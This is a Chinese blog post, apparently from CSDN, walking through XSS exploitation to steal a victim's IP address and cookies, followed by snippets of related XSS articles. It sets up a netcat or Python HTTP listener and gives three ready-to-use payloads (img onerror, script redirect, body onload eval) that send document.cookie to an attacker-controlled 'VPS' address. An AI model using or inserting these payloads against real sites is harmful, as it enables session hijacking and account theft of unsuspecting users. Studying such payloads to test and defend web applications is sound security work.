XSS利用方式

最新推荐文章于 2023-05-29 19:57:00 发布
最新推荐文章于 2023-05-29 19:57:00 发布
阅读量8.9k 收藏 10
点赞数 1
分类专栏: 安全 XSS 文章标签: XSS 安全 XSS利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011215939/article/details/79076785
版权
安全 同时被 2 个专栏收录
33 篇文章 4 订阅
订阅专栏
XSS
3 篇文章 0 订阅
订阅专栏

前言

学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS的利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下……

准备

为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS,但是我没办法准备,所以只好一些简单的方法:基本的思想是,获取目标IP,将IP返回到我们指定的IP端口上,我们监听这个端口,获取返回的IP信息。

利用netcat

如果系统中有NC,可以运行命令:

nc -vil 8080

这里写图片描述

利用python

只要安装了python,并添加了环境变量,就可以在DOS中运行:

Python -m SimpleHTTPServer 8080

这里写图片描述

注意:这个命令只能在DOS中运行,不能在python交互式环境中运行,否则会出现如下情况:
这里写图片描述
注意:以上两种方法的DOS窗口都不能关闭,否则失败。

获取IP及Cookie代码

  • img标签
<img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','http://VPS地址:80/?='+document.cookie); >
  • script标签
<script>window.location.href='http://VPS地址/?cookie='+document.cookie</script>
  • body标签
<body onload=eval(“document.body.appendChild(document.createElement('img')).setAttribute('src','http://VPS地址/?='+document.cookie);”)></body>

过程

  1. 先使用命令:Python -m SimpleHTTPServer 8080
    这里写图片描述
    2.使用以上3个标签中的一种编写成HTML文件,并访问;

    • img标签
      这里写图片描述

    • img标签运行结果:
      这里写图片描述

    • script标签
      这里写图片描述

    • script标签运行结果
      这里写图片描述

    • body标签
      这里写图片描述

    • body标签运行结果
      这里写图片描述

其实XSS还有其他利用方法,需要更加深入的研究、发掘。但是仅仅获取目标IP绰绰有余了。
参考文章:(http://www.freebuf.com/sectool/159689.html)

猫星人不会笑
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS脚本攻击使用方法初级教程
11-27
XSS跨站攻击介绍,解释XSS是如何进行攻击的以及执行攻击的实例
教大家如何找XSS漏洞并且利用
最新发布
liuhyusb的博客
06-19 1312
cross sitescript跨站脚本攻击,为了避免和css重复,就叫XSS了,是客户端脚本安全中的头号大敌。
XSS详解及其利用方式
今天不学习 明天变垃圾
11-14 3808
XSS-xss
xss的高级利用
weixin_34378922的博客
03-27 487
以往对XSS利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。一 XSS下提升权限       随着AJAX技术在许多大型SNS网站的应用,XSS也变得愈加流行,在XSS场景下运用AJAX能更有效地发挥它的作用。用户输入的地方最容易滋生XSS,譬如留言、评论等表单,我搭...
XSS总结
weixin_51356351的博客
11-19 1470
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
xss 利用方式
07-30 787
漏洞原理   HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本...
XSS漏洞利用方式汇总
热门推荐
Kevin's Blog
05-04 1万+
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
XSS漏洞的利用
LizePing_的博客
07-29 4493
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS漏洞利用方式总结
XunanSec的博客
05-21 4652
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
xss利用于挖掘
08-17
学习xss利用及挖掘的好资料,有助于新手安全学习入门使用
XSS获取cookie和利用方式 (ASP版).txt
12-22
XSS获取cookie和利用方式简单方法
XSS利用文档
05-23
反射性跨站脚本攻击的利用解析, XSS的高级利用部分总结,XSS跨站脚本攻击汇总。
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
业界大佬PKAV总结的xss的常见利用方法,可以说是比较全面的Web XSS利用方法
xsstry:xss漏洞利用平台
06-10
xsstry xss 漏洞利用平台 xss 漏洞利用平台
xss防御之php利用httponly防xss攻击
10-26
主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2407
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
XSS利用之一看就懂
qq_42743187的博客
01-31 394
xss利用方法之前,先分享一个前几天友情测试的案例吧 一、XSS案例 站点就不说了,图片打码,主要看效果就可以了???? 页面上有个搜索框,输入随机值在标签中输出,不允许输入尖括号,页面会直接显示错误,但双引号可以使用 " οnclick="alert(1),直接测试,查看页面源代码发现一个问题: 就是我输入的英文小括号,输出时变成了中文括号,这样alert()函数就执行不了了。。。 于是想到,用反引号来代替小括号试试,成功弹窗,源代码显示如下: 但是这里又存在一个问题,反引号里的内容会被当成字符串处
xss 基本使用
sgear
04-15 1513
 下面我就分两个部分分析XSS原理: 一、XSS的触发条件 了解XSS的触发条件就先得从HTML(超文本标记语言)开始,我们浏览的网页全部都是基于超文本标记语言创建的,如显示一个超链接: http://blog.csdn.net/sgear">sgear blog 而XSS的原理也就是往HTML中注入脚本,HTML指定了脚本标记.在没有过滤字符的情况下,只需要保持完整无错的脚本标记即可触发XS
XSS利用
YIN_XIAOMAO的博客
05-29 215
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
利用excel导入进行xss攻击
05-18
其次,Excel导入功能通常不会执行JavaScript代码,因此无法进行XSS攻击。但是,如果你成功地将恶意脚本嵌入到Excel文件中,并且用户将其打开并启用宏,那么你可能会在用户的计算机上运行恶意代码。 因此,我的建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值